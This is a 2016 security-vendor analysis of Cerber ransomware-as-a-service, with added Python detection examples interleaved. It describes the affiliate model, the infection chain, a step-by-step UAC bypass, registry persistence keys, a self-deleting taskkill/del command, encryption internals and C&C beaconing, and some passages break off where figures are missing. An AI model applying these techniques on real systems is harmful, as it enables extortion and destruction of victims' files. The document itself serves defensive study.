AN IN-DEPTH EXPOSÉ ON
CERBER RANSOMWARE-AS-A-SERVICE
AUGUST 15, 2016
TABLE OF CONTENTS
CERBERRING:
AN IN-DEPTH EXPOSÉ ON CERBER RANSOMWARE-AS-A-SERVICE........ 3
THE RANSOMWARE-AS-A-SERVICE ECOSYSTEM...................................... 3
TARGETING THE MASSES............................................................................ 9
FOLLOWING THE MONEY TRAIL.................................................................. 19
CERBER 2...................................................................................................... 22
TECHNICAL DESCRIPTION ......................................................................... 23
MALWARE FUNCTIONALITY AND PAYLOAD........................................... 23
UAC BYPASS............................................................................................ 27
ENCRYPTION PROCESS.......................................................................... 27
NETWORK AND COMMUNICATION........................................................ 33
PROTECTION MECHANISMS.................................................................. 35
DECRYPTION PROCESS.......................................................................... 37
IN CONCLUSION........................................................................................... 42
APPENDICES................................................................................................ 43
APPENDIX A INDICATORS OF COMPROMISE...................................... 44
APPENDIX B CERBER WEB SERVICE.................................................. 45
APPENDIX C CONFIGURATION RESOURCE........................................ 49
2016 Check Point Software Technologies Ltd. All rights reserved. Classification: [Protected]
August 15, 2016
According to crbr, a unique Bitcoin address is generated for each victim. The affiliate can adjust the initial ransom demand,
which doubles after five days if not paid in full. Upon payment, the victim can download a unique decryption tool for their machine.
crbr also mentions that a polite and friendly online support service exists, with a ticketing system embedded in the affiliate panel.
Figure 2: Cerber Affiliate Panel Earn 60% of the Profit, and a 5% Referral Rate
A campaign presented in the advertisement achieved 13,491 installs and 116 ransom payments earning a total of $34,800.74
between April and May 2016.
Another campaign that took place between February and April 2016 resulted in 10,178 installs, 164 ransom payments, and generated
a total revenue of $53,458.06.
A downloader is attached to each email, either as a document or as an archived Windows script. Sometimes two files are attached,
but in most cases those files are identical. Although different obfuscations are applied to different downloaders, all downloaders
contact the same domains to pull and execute the final Cerber payload.
Heavy reuse of files was seen in these campaigns: the exact same files were observed in many attack instances. The following
figure shows the file distribution measured over hundreds of infection attempts, emphasizing the repeated use of the attached
downloaders and pictures.
The different wording observed suggests that the first line of text is pseudo-randomly generated in an attempt to mimic legitimate
messages usually sent between colleagues, in particular those in enterprise environments who review and revise documents on a
regular basis. The second line of text is a name, which also appears in the email sender address.
After observing for some time, the only notable change to the email attachments was the documents' file extension. In June,
the .dotm extension was prevalent, whereas in July it shifted to .rtf. Macro content is disabled by default in most
Microsoft Office setups. Therefore, each document starts with instructions to manually enable the macro content, resulting in the
victim enabling the execution of the embedded downloader. Below the instructions, a long string of Cyrillic characters appears
white-on-white. Presumably, this bypasses automatic mechanisms that flag documents without textual content.
Figure 15: A Word Document Prompts The User into Enabling The Malicious Macro Content
The downloader drops a VBS script, which in turn downloads a JPG file. The JPG contains an image, but it also contains the final
Cerber payload as a stub encoded with a 1-byte XOR key. Once downloaded, the stub is decoded and the payload is executed by
the script.
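To triage such a carrier file without executing anything, the following added example (not code from the report or from Cerber) locates data appended after a JPEG's End-Of-Image marker and brute-forces the single XOR key byte by looking for a decoded MZ/PE header; the sample JPEG and stub are constructed inline.

```python
import struct

# Constructed sample, not a real Cerber carrier: a tiny JFIF header, the EOI marker (FF D9), and
# then a fake PE stub (MZ header, e_lfanew -> "PE\0\0") XOR-encoded with the single key byte 0x5A.
_KEY = 0x5A
_STUB = bytearray(b"MZ\x90\x00" + b"\x00" * 0x3C)
struct.pack_into("<I", _STUB, 0x3C, 0x80)            # e_lfanew: the PE signature lives at 0x80
_STUB += b"\x00" * (0x80 - len(_STUB)) + b"PE\x00\x00" + b"\x00" * 16
SAMPLE_JPG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9"
              + bytes(b ^ _KEY for b in _STUB))


def looks_like_pe(buf: bytes) -> bool:
    """True if buf starts with an MZ header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(buf) - 4 and buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def xor_decode(blob: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in blob)


def find_xor_key(blob: bytes):
    """Try all 256 single-byte keys on the first 512 bytes; return the key that yields a PE header."""
    for key in range(256):
        if looks_like_pe(xor_decode(blob[:0x200], key)):
            return key
    return None


def triage_jpg(data: bytes):
    """Scan every EOI marker; report offset, XOR key and size of an appended XOR-encoded PE, if any."""
    pos = 0
    while True:
        eoi = data.find(b"\xff\xd9", pos)
        if eoi < 0:
            return None
        tail = data[eoi + 2:]
        key = find_xor_key(tail)
        if key is not None:
            return {"offset": eoi + 2, "xor_key": key, "payload_size": len(tail)}
        pos = eoi + 2
```

A key of 0 is reported too, which covers a plainly appended executable.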
One logical assumption is that the ransom payments are handled in the following way:
An analysis of tens of thousands of Bitcoin wallets generated for Cerber ransomware victims reveals the transfer process:
CERBER 2
A new version of Cerber, dubbed Cerber 2, was released on July 29. Following the release, some campaigns upgraded to the new
version, but most campaigns still distribute the original version. The new version boasts several improvements, as specified in the
new advertisement published by crbr.
TECHNICAL DESCRIPTION
Overview
First observed in February 2016, Cerber ransomware quickly became one of the most widespread ransomware families. Capable of
bypassing UAC, Cerber also employs several VM evasion techniques. Some of these techniques are based on detecting specific
virtualization technology, while others are based on the existence of system certificates.
At runtime, the keys for the encryption process are randomly generated on the victim's machine. A dedicated web view grants the
victim the option to decrypt one file for free as a capability demonstration. Cerber does not require C&C communication to start
the encryption process.
As stated in the advertisement, when Cerber finishes encrypting the victim's drive, a prompt appears demanding the ransom
payment within five days. If the deadline is not met, the ransom is doubled to two BTC. Once the victim deposits the money, they
receive the decryption key.
INSTALLATION
The malware's primary goal is to gain system persistence. To do so, it performs the following actions:
- Search the victim's system for any previous installation of Cerber by checking whether the executable is located at
%APPDATA%\Roaming\{GUID}. If Cerber is already installed on the system, execution continues in one of the working modes
(based on the executable's command line arguments).
- Search the %SYSTEM32% directory for any filename that matches the regular expression ${r1}*${r2}.exe (where r1
and r2 are randomly generated bytes) and is not part of the following filename list:
Once a filename is found, it is used as the name for the malware (referred to below as MALW_NAME).
- Create a duplicate copy of its own image and write it to the %APPDATA%\Roaming\{GUID} directory under the name
MALW_NAME.
- Set the file time of the newly copied executable to that of kernel32.dll.
- Run the newly copied executable without arguments. This initiates the default encryption working mode by spawning a new
process responsible for encrypting the file system.
- Clear all information from the registry keys, remove the created link, and terminate using this command:
cmd.exe /d /c taskkill /t /f /im {EXE} > NUL & ping -n 1 127.0.0.1 > NUL & del {EXE} > NUL
WORKING MODES
Cerber has several execution modes, each responsible for a different functionality and defined by command line arguments
given to the main executable file.
Common Functionality
All working modes share some common functionality, including:
- Obtain SE_DEBUG_PRIVILEGES (SeDebugPrivilege), which is required to execute high-privileged actions such as process injection.
- Execute the UAC bypass technique if the process token does not belong to WinBuiltinAdministratorsSid.
- Create a shortcut (.lnk file) to the malicious executable in the
${USER}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup folder and set its
FileDescription to the MALW_NAME file.
- Ensure persistence by setting up the following registry keys, where REG_KEY = CutExtension(MALW_NAME):
HKU\{UserSID}\Software\Microsoft\Windows\CurrentVersion\Run
    {REG_KEY} = {PATH_TO_EXE}
HKU\{UserSID}\Software\Microsoft\Windows\CurrentVersion\RunOnce
    {REG_KEY} = {PATH_TO_EXE}
HKU\{UserSID}\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    Run = {PATH_TO_EXE}
HKU\{UserSID}\Software\Microsoft\Command Processor
    AutoRun = {PATH_TO_EXE}
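An added detection example (not from the report): it parses a constructed .reg export and flags executables under AppData\Roaming\{GUID}\ that are registered in any of the four persistence locations above, counting how many of them point at the same file. The SID, GUID and file names in the sample are made up.

```python
import re
from collections import defaultdict

# The four locations Cerber writes, relative to HKU\{UserSID}\ (from the report).
# None = any value name is accepted (Cerber uses {REG_KEY}); otherwise the value name must match.
CERBER_AUTORUNS = {
    r"software\microsoft\windows\currentversion\run": None,
    r"software\microsoft\windows\currentversion\runonce": None,
    r"software\microsoft\windows\currentversion\policies\explorer": "run",
    r"software\microsoft\command processor": "autorun",
}
# An .exe inside \AppData\Roaming\{GUID}\, the drop location described in the Installation section.
GUID_DIR = re.compile(r"\\appdata\\roaming\\\{[0-9a-f-]{36}\}\\[^\\]+\.exe", re.I)

# Constructed .reg export (not a real capture): one benign OneDrive entry and one Cerber-style
# executable registered in three of the four locations.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"
"dfrgui"="C:\\Users\\alice\\AppData\\Roaming\\{3f2504e0-4f89-11d3-9a0c-0305e82c3301}\\dfrgui.exe"

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"Run"="C:\\Users\\alice\\AppData\\Roaming\\{3f2504e0-4f89-11d3-9a0c-0305e82c3301}\\dfrgui.exe"

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Command Processor]
"AutoRun"="C:\\Users\\alice\\AppData\\Roaming\\{3f2504e0-4f89-11d3-9a0c-0305e82c3301}\\dfrgui.exe"
"""


def parse_reg_export(text: str):
    """Yield (key_path, value_name, data) for every string value in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = re.match(r'"([^"]+)"="(.*)"$', line)
            if m:
                # .reg exports escape backslashes as \\ ; undo that for path matching
                yield key, m.group(1), m.group(2).replace("\\\\", "\\")


def find_cerber_persistence(reg_text: str) -> dict:
    """Map each suspicious executable (lowercased) to the persistence locations it is registered in."""
    hits = defaultdict(set)
    for key, name, data in parse_reg_export(reg_text):
        hive_rel = re.sub(r"^hkey_users\\[^\\]+\\", "", key.lower())   # strip HKU\{UserSID}\
        if hive_rel not in CERBER_AUTORUNS:
            continue
        wanted = CERBER_AUTORUNS[hive_rel]
        if wanted is not None and name.lower() != wanted:
            continue
        m = GUID_DIR.search(data)
        if m:
            hits[m.group(0).lower()].add(hive_rel)
    return {exe: sorted(locs) for exe, locs in hits.items()}
```

The same executable appearing in several of these locations at once, especially Command Processor\AutoRun, is the strongest signal; a single Run entry alone deserves a look at the file rather than an alert.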
UAC Bypass
The ransomware tries to bypass UAC and execute with elevated privileges:
1. Check whether the HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLua flag is set.
If it is not set, Cerber launches in eval mode using the arguments -eval {CurrentProcessID} to terminate the current
execution mode and start the encryption process. If the EnableLua flag is set, Cerber enumerates the %SYSTEM32% folder
to locate files with the following features:
- Files with the EXE extension and neither the FILE_ATTRIBUTE_SYSTEM nor the FILE_ATTRIBUTE_HIDDEN file attribute
flag. The EXE file's manifest must also contain the following information:
<autoElevate>true</autoElevate>
<requestedExecutionLevel level="requireAdministrator"/>
- The EXE file must import a DLL whose name does not start with api-ms-win- and does not appear in the
\KnownDlls directory object.
2. Copy the matched DLL (referenced by the EXE file) to the %TEMP% directory using a random name with a .tmp extension. It
then patches the first instruction of the DllEntryPoint, redirecting the execution flow to the malicious code, which is
responsible for running Cerber with elevated privileges.
3. Create a randomly named directory using [A-Za-z0-9] characters in the %SYSTEM32% directory.
4. Set the cerber_uac_status property of the Shell_TrayWnd window to FALSE.
5. Create the explorer.exe process in the CREATE_SUSPENDED state and inject malicious code into the explorer.exe
process space.
6. explorer.exe renames the DLL from the %TEMP% directory and moves it and the EXE file to the previously created random
directory.
7. explorer.exe starts the EXE process, thus executing the malicious code from the DLL. The DLL then launches the ransomware
with elevated privileges using eval mode with the arguments -eval {CerberInstanceProcessID}.
8. After creating the EXE file, explorer.exe sets the cerber_uac_status property to TRUE.
9. Wait for up to one minute for the cerber_uac_status property to be set. If it is still not set, delete the DLL
file from the %TEMP% directory and look for another suitable DLL in the same EXE, or for a new EXE image.
Encryption Process
The Cerber ransomware uses a combination of symmetric and asymmetric encryption algorithms, encrypting the user's data
without communicating with the C&C server.
All encryption keys are randomly generated. The RC4 and RSA algorithms are used for file encryption.
If the configuration section's encrypt.multithread flag is set, the ransomware initiates a number of threads for the
encryption process. The number of initiated threads equals the number of processors multiplied by 2.
The ransomware creates three files containing the ransom message in each encrypted folder. The names and the content of
these files can be found in the configuration's help_files.files field.
Encryption Preparation
This stage generates the list of files to be encrypted through the following process:
- Collect physical drive data with the GetLogicalDrives API call. The drive types relevant for encryption are
DRIVE_REMOVABLE, DRIVE_FIXED and DRIVE_RAMDISK.
- Check the DOS name of each device by calling the QueryDosDevice API. If the DOS device name is equal to \??\, the drive
is skipped.
- If the configuration section's encrypt.network flag is enabled, also enumerate all shared network drives and all disk
resources on the network, skipping the directories specified in the configuration section's blacklist.folders field.
- Skip files smaller than the value defined in the configuration section's min_file_size field, files listed in the
configuration section's blacklist.files field, and files whose extensions do not match the encrypt.files field.
The rest of the files are added to the list of files to be encrypted.
- If the HKCU\Printer\Defaults\{UNIQUE-ID}\Installed key is not present or is equal to 0 and the configuration
section's servers.send_stat flag is set, spawn a process in stat mode to send statistical information to
the C&C server.
Encryption Routine
The encryption routine's goal is to encrypt a single file from the file system. Cerber therefore runs this routine on every file
marked for encryption (the list generated in the Encryption Preparation stage).
First, a 10-byte random alphanumeric string is generated. Together with the .cerber extension, this string becomes the
encrypted filename, so each encrypted filename matches the pattern [0-9A-Za-z_-]{10}.cerber.
To encrypt the file, Cerber "steals" the first N bytes of the file. It calculates the number of stolen bytes using the following
algorithm:
uint16_t rsa_key_size_bytes = (uint16_t)((rsa_key_size >> 3) - 1);
int m = rsa_key_size_bytes - 21;
if (rsa_key_size_bytes - 21 >= 0x10)
    m = 16;
g_StolenBytesSize = rsa_key_size_bytes - m - 21;   /* 34 bytes for the 576-bit rsa_key_size in Appendix C */
Next, a custom random number generation function generates a 128-bit RC4 key (referred to below as rc4_key).
Cerber then splits the file into multiple encryption blocks. The number of blocks is determined by the calculation below, based on
the configuration section's max_block_size and max_blocks fields.
int calculate_numof_block(uint32_t dwFilesize, uint32_t dwStolenBytes) {
    uint32_t number_of_blocks = 1;
    uint32_t size_without_stolen_bytes = dwFilesize - dwStolenBytes;
    uint32_t max_block_size_bytes = max_block_size * 1024 * 1024;   /* config max_block_size is in MB */
    uint32_t max_bytes_per_block = max_block_size_bytes / max_blocks; /* config max_blocks */
    if (size_without_stolen_bytes / max_bytes_per_block > max_blocks)
        number_of_blocks = max_blocks;
    return number_of_blocks;
}
The encryption routine uses two main data structures to represent the encrypted file: FileStolenHeader and FileMetainfo.
Their layouts are shown below:
struct FileStolenHeader {
    char     magic[4];                      // magic header: 'rbrc'
    uint32_t rand_bytes;                    // random bytes
    uint16_t u_filename_len;                // length of filename in Unicode, including the 0 terminator
    uint8_t  blocks_number;                 // number of blocks to encrypt
    uint32_t block_size;                    // block size
    uint16_t bytes_to_steal;                // number of bytes to steal
    uint32_t murmur_hash_of_stolen_bytes;   // murmur3 32-bit hash of stolen bytes
    char     rc4_key[16];                   // randomly generated RC4 key (rc4_key)
    char     stolen_bytes[0];               // stolen bytes
};
struct FileMetainfo {
    FILETIME CreationTime;                  // original file creation time
    FILETIME LastAccessTime;                // original last access time
    FILETIME LastWriteTime;                 // original last write time
    char     original_filename[0];          // original filename
    uint64_t r_murmur_hashes_of_blocks[0];  // hashes of the blocks to be encrypted, with random 4-byte data salting
};
Cerber encrypts each file block with the RC4 algorithm using the previously generated rc4_key value as the encryption key.
The encrypted blocks then overwrite and replace the original bytes in the file.
After encrypting all file data, the ransomware replaces the stolen bytes at the beginning of the file with random bytes
generated by its custom random number generation function. It encrypts the FileMetainfo structure with the RC4
algorithm using rc4_key as the encryption key. The FileStolenHeader structure is then encrypted with the RSA
algorithm using RSA_X_PUB as the encryption key.
Because decrypting the file correctly requires both data structures, they are appended to the end of the encrypted file.
The locally generated RSA keys RSA_X_PUB and RSA_X_PRI are also required for the decryption process. They
are therefore retrieved (in encrypted form) from the registry key
HKCU\Printer\Defaults\{UNIQUE-ID}\Component_01 and also appended to the end of the encrypted file. Before
appending, the keys are base64-decoded.
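The following added example (not the report's or Cerber's code) applies the two calculations above to the Appendix C configuration values (rsa_key_size 576, max_blocks 5, max_block_size 2) and parses a constructed plaintext FileStolenHeader. It assumes a packed little-endian layout, which the report does not state, and because the on-disk header is RSA-encrypted the parser only applies to a header that has already been decrypted.

```python
import re
import struct

# Values taken from the configuration resource in Appendix C.
RSA_KEY_SIZE = 576
MAX_BLOCKS = 5
MAX_BLOCK_SIZE_MB = 2

# Encrypted filename pattern from the Encryption Routine section.
ENCRYPTED_NAME = re.compile(r"^[0-9A-Za-z_-]{10}\.cerber$")


def stolen_bytes_size(rsa_key_size: int) -> int:
    """Number of leading bytes 'stolen' from each file, per the algorithm quoted above."""
    rsa_key_size_bytes = ((rsa_key_size >> 3) - 1) & 0xFFFF
    m = rsa_key_size_bytes - 21
    if m >= 0x10:
        m = 16
    return rsa_key_size_bytes - m - 21


def number_of_blocks(file_size: int, stolen: int,
                     max_block_size_mb: int = MAX_BLOCK_SIZE_MB, max_blocks: int = MAX_BLOCKS) -> int:
    """calculate_numof_block: a single block unless the file spans more than max_blocks slices."""
    size_without_stolen = file_size - stolen
    max_bytes_per_block = (max_block_size_mb * 1024 * 1024) // max_blocks
    return max_blocks if size_without_stolen // max_bytes_per_block > max_blocks else 1


# Assumed packed little-endian layout of FileStolenHeader (the report does not state the packing).
STOLEN_HEADER_FMT = "<4sIHBIHI16s"
STOLEN_HEADER_LEN = struct.calcsize(STOLEN_HEADER_FMT)   # 37 bytes precede stolen_bytes[]


def parse_stolen_header(buf: bytes) -> dict:
    """Parse a plaintext FileStolenHeader followed by its stolen_bytes[] payload."""
    (magic, rand_bytes, u_filename_len, blocks_number, block_size,
     bytes_to_steal, stolen_hash, rc4_key) = struct.unpack_from(STOLEN_HEADER_FMT, buf)
    if magic != b"rbrc":
        raise ValueError("bad magic: not a FileStolenHeader")
    stolen = buf[STOLEN_HEADER_LEN:STOLEN_HEADER_LEN + bytes_to_steal]
    if len(stolen) != bytes_to_steal:
        raise ValueError("truncated stolen_bytes")
    return {"rand_bytes": rand_bytes, "u_filename_len": u_filename_len,
            "blocks_number": blocks_number, "block_size": block_size,
            "bytes_to_steal": bytes_to_steal, "murmur_hash_of_stolen_bytes": stolen_hash,
            "rc4_key": rc4_key, "stolen_bytes": stolen}


def build_sample_header() -> bytes:
    """Constructed header for a fictitious 'report.docx'; the hash and RC4 key values are made up."""
    stolen = b"PK\x03\x04" + bytes(range(30))          # 34 bytes: a DOCX's ZIP signature plus filler
    hdr = struct.pack(STOLEN_HEADER_FMT, b"rbrc", 0x11223344, len("report.docx") + 1, 1, 4096,
                      len(stolen), 0xDEADBEEF, b"0123456789abcdef")
    return hdr + stolen
```

With this configuration a file of roughly 2.5 MB or less gets one block and anything larger gets the maximum of five.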
The overall structure of the encrypted file changes depending on the number of encrypted blocks it contains. Listed below are
all the various possibilities:
uint32_t g_Magic_0 = 0x12345678;
uint32_t g_Magic_1 = 0x159A55E5;
uint32_t g_Magic_2 = 0x1F123BB5;
uint32_t g_Magic_3 = 0x5491333;

uint32_t GenerateRandomByte(uint32_t s) {
    uint64_t is = 0;
    if (!s)
        return s;
    is = g_Magic_0;
    if (g_Magic_0 == 0x12345678)       // first call: seed the state from the CPU timestamp counter
        is = __rdtsc();
    g_Magic_0 = g_Magic_1;
    g_Magic_1 = g_Magic_2;
    g_Magic_2 = g_Magic_3;
    g_Magic_3 ^= is ^ ((uint32_t)is << 11)
               ^ (((uint32_t)is ^ ((uint32_t)is << 11) ^ ((uint32_t)is >> 11)) >> 8);
    return g_Magic_3 % s;              // assumed: the listing omits the final return; the bound s implies a modulo
}
Format        Content
MD5_KEY       %02X%02X%02X%02X%02X%02X
PARTNER_ID    %05x (IMAGE_NT_HEADER.ImageOptionalHeader.Checksum)
OS            %x
IS_X64        %d
IS_ADMIN      %d
COUNT_FILES   %x (appears to be the number of files that meet all conditions for being encrypted)
STOP_REASON   %d
COUNTRY       %s
PC_ID         %c%c%c%c-%c%c%c%c%c%c%c%c-%c%c%c%c%c%c%c%c
For both message types, all data is concatenated and converted to lowercase. Cerber then calculates the MD5 hash of the
concatenated data and appends only the first hash byte to the message, using the %02x format.
Finally, Cerber converts the entire message to lowercase once more and transmits it over UDP to the entire network
range specified in the configuration section's servers.statistics.ip field.
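As an added detection example (not from the report), the following builds a data_start statistics message as described above and flags UDP datagrams that carry one: destination inside servers.statistics.ip, port 6891, hex-only body and a matching trailing MD5 byte. It follows the Appendix C data_start template (MD5_KEY through STOP_REASON), so the COUNTRY and PC_ID fields are not modelled; all field values and the traffic sample are constructed.

```python
import hashlib
import ipaddress
import re

# servers.statistics values from the Appendix C configuration.
STAT_NET = ipaddress.ip_network("87.98.128.0/19")
STAT_PORT = 6891


def build_stat_message(md5_key: bytes, partner_id: int, os_ver: int, is_x64: int,
                       is_admin: int, count_files: int, stop_reason: int) -> str:
    """Assemble a data_start message: formatted fields, lowercased, plus the first MD5 byte as %02x."""
    body = ("%02X%02X%02X%02X%02X%02X" % tuple(md5_key[:6])
            + "%05x" % partner_id + "%x" % os_ver + "%d" % is_x64
            + "%d" % is_admin + "%x" % count_files + "%d" % stop_reason).lower()
    check = hashlib.md5(body.encode("ascii")).digest()[0]
    return (body + "%02x" % check).lower()


def is_cerber_stat_beacon(dst_ip: str, dst_port: int, payload: bytes) -> bool:
    """Flag a UDP datagram that matches the destination range/port and the self-checksum."""
    if dst_port != STAT_PORT or ipaddress.ip_address(dst_ip) not in STAT_NET:
        return False
    text = payload.decode("ascii", errors="replace")
    # Shortest legal message is data_finish: 12 hex chars of MD5_KEY plus the 2-char check byte.
    if len(text) < 14 or not re.fullmatch(r"[0-9a-f]+", text):
        return False
    body, check = text[:-2], text[-2:]
    # A random hex string passes this by chance only 1 time in 256; the range/port filter above
    # and the volume of the broadcast (a whole /19) are what make it a confident detection.
    return hashlib.md5(body.encode("ascii")).digest()[0] == int(check, 16)


def scan_datagrams(datagrams) -> list:
    """Return the indexes of (dst_ip, dst_port, payload) tuples that look like Cerber beacons."""
    return [i for i, (ip, port, data) in enumerate(datagrams)
            if is_cerber_stat_beacon(ip, port, data)]


# Constructed traffic sample: a beacon built above, an ordinary DNS query, and a beacon whose
# trailing check byte has been altered.
SAMPLE_BEACON = build_stat_message(bytes.fromhex("deadbeef0001"), 0x1f, 0x601, 1, 0, 0x2a, 3)
SAMPLE_DATAGRAMS = [
    ("87.98.130.17", 6891, SAMPLE_BEACON.encode("ascii")),
    ("8.8.8.8", 53, b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07example\x03com\x00\x00\x01\x00\x01"),
    ("87.98.130.17", 6891,
     (SAMPLE_BEACON[:-2] + ("00" if SAMPLE_BEACON[-2:] != "00" else "01")).encode("ascii")),
]
```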
Protection Mechanisms
Cerber contains many embedded evasion techniques. However, for these techniques to be enabled, specific flags must be set
in its configuration section. None of the samples we analyzed had all these flags enabled.
Anti-VM
Cerber contains several VM evasion techniques, some based on specific virtualization technology detection, and others on the
existence/absence of system certificates.
Hypervisor   Checks if the 31st bit of ECX is set after executing the cpuid instruction with EAX set to 1.
VirtualBox   C:\WINDOWS\system32\drivers\VBoxMouse.sys
Parallels
QEMU
VMWare       C:\Windows\system32\drivers\vmmouse.sys or C:\Windows\system32\drivers\vmhgfs.sys
Wine
Decryption Process
Cerber starts the decryption process by parsing the decryption configuration embedded in the binary. The configuration is
presented below.
{
  "default": {
    "tor": "cerberhhyed5frqa",
    "site_1": "onion.to",
    "site_2": "onion.cab",
    "site_3": "onion.nu",
    "site_4": "onion.link",
    "site_5": "tor2web.org"
  },
  "encrypt": {
    "new_extension": ".cerber",
    "multithread": 1
  },
  "help_files": {
    "files": [
      { "file_extension": ".html" },
      { "file_extension": ".txt" },
      { "file_extension": ".url" },
      { "file_extension": ".vbs" }
    ],
    "files_name": "# DECRYPT MY FILES #"
  },
  "servers": {
    "decryptor": {
      "attempts": 5,
      "timeout": 2,
      "url": "http:\/\/{TOR}.onion\/decryptor\/"
    }
  },
  "global_public_key_size": 256
}
The captcha solution is sent back along with the ENC_RSA_BLOB and KEY_ID. The ENC_RSA_BLOB was previously encoded
using URL-safe base64.
POST /decryptor HTTP
Content-Type: application/x-www-form-urlencoded

captcha=%d&sign=%s&private_key=%s
(CAPTCHA_SOLUTION, KEY_ID, ENC_RSA_BLOB_B64)
The C&C server sends a response to the decryptor in JSON format. The decryptor checks whether the error field of the
response is equal to null. If not, the decryptor assumes that the C&C server-side script has found an error and notifies
the victim.
Decryption Routine
The decryption process starts only after a valid response is received from the C&C server. The routine's goal is to decrypt
every file on the infected machine. As mentioned earlier in the encryption section, an encrypted file has the following
format (a sample file with one encrypted block is shown).
After the process finished, we were notified that the system was successfully decrypted:
IN CONCLUSION
As demonstrated in this report, the Cerber ransomware represents a highly advanced ransomware-as-a-service operation. The
highly profitable business of ransomware is no longer reserved only for skilled attackers. Even the most novice hacker can easily
reach out in closed forums to obtain an undetected ransomware variant and the designated set of command and control (C&C)
infrastructure servers required to easily manage a successful ransomware campaign.
To learn more about the latest ransomware tactics and how to protect against them, read our ransomware whitepaper and watch our
webcast at: https://www.checkpoint.com/resources/preventing-ransomware/.
APPENDICES
SHA256
2d08ffeba708fb833404d2c320ea4f29365c791d504181e08e3e9b529f5cf096
Dynamic Indicators
Presence of the following registry keys:
Registry Key                          Value Name     Type
HKCU\Printer\Defaults\{UNIQUE-ID}\    Component_00   REG_BINARY
HKCU\Printer\Defaults\{UNIQUE-ID}\    Component_01   REG_BINARY
HKCU\Printer\Defaults\{UNIQUE-ID}\    Installed      REG_DWORD
Main Page
Web Captcha
"global_public_key":
"LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROE
FNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpR
VlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0y
Y29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFR
XZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTK
VwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFye
WlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFE
MEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==",
"antiav": 1,
"encrypt": {
"files": [
[
".contact",
".dbx",
".doc",
".docx",
".jnt",
".jpg",
".mapimail",
".msg",
".oab",
".ods",
".pdf",
".pps",
".ppsm",
".ppt",
".pptm",
".prf",
".pst",
".rar",
".rtf",
".txt",
".wab",
".xls",
".xlsx",
".xml",
".zip",
".1cd",
".3ds",
".3g2",
".3gp",
".7z",
".7zip",
".accdb",
".aoi",
".asf",
".asp",
".aspx",
".asx",
".avi",
".bak",
".cer",
".cfg",
".class",
".config",
".css",
".csv",
".db",
".dds",
".dwg",
".dxf",
".flf",
".flv",
".html",
".idx",
".js",
".key",
".kwm",
".laccdb",
".ldf",
".lit",
".m3u",
".mbx",
".md",
".mdf",
".mid",
".mlb",
".mov",
".mp3",
".mp4",
".mpg",
".obj",
".odt",
".pages",
".php",
".psd",
".pwm",
".rm",
".safe",
".sav",
".save",
".sql",
".srt",
".swf",
".thm",
".vob",
".wav",
".wma",
".wmv",
".xlsb",
".3dm",
".aac",
".ai",
".arw",
".c",
".cdr",
".cls",
".cpi",
".cpp",
".cs",
".db3",
".docm",
".dot",
".dotm",
".dotx",
".drw",
".dxb",
".eps",
".fla",
".flac",
".fxg",
".java",
".m",
".m4v",
".max",
".mdb",
".pcd",
".pct",
".pl",
".potm",
".potx",
".ppam",
".ppsm",
".ppsx",
".pptm",
".ps",
".pspimage",
".r3d",
".rw2",
".sldm",
".sldx",
".svg",
".tga",
".wps",
".xla",
".xlam",
".xlm",
".xlr",
".xlsm",
".xlt",
".xltm",
".xltx",
".xlw",
".act",
".adp",
".al",
".bkp",
".blend",
".cdf",
".cdx",
".cgm",
".cr2",
".crt",
".dac",
".dbf",
".dcr",
".ddd",
".design",
".dtd",
".fdb",
".fff",
".fpx",
".h",
".iif",
".indd",
".jpeg",
".mos",
".nd",
".nsd",
".nsf",
".nsg",
".nsh",
".odc",
".odp",
".oil",
".pas",
".pat",
".pef",
".pfx",
".ptx",
".qbb",
".qbm",
".sas7bdat",
".say",
".st4",
".st6",
".stc",
".sxc",
".sxw",
".tlg",
".wad",
".xlk",
".aiff",
".bin",
".bmp",
".cmt",
".dat",
".dit",
".edb",
".flvv",
".gif",
".groups",
".hdd",
".hpp",
".log",
".m2ts",
".m4p",
".mkv",
".mpeg",
".ndf",
".nvram",
".ogg",
".ost",
".pab",
".pdb",
".pif",
".png",
".qed",
".qcow",
".qcow2",
".rvt",
".st7",
".stm",
".vbox",
".vdi",
".vhd",
".vhdx",
".vmdk",
".vmsd",
".vmx",
".vmxf",
".3fr",
".3pr",
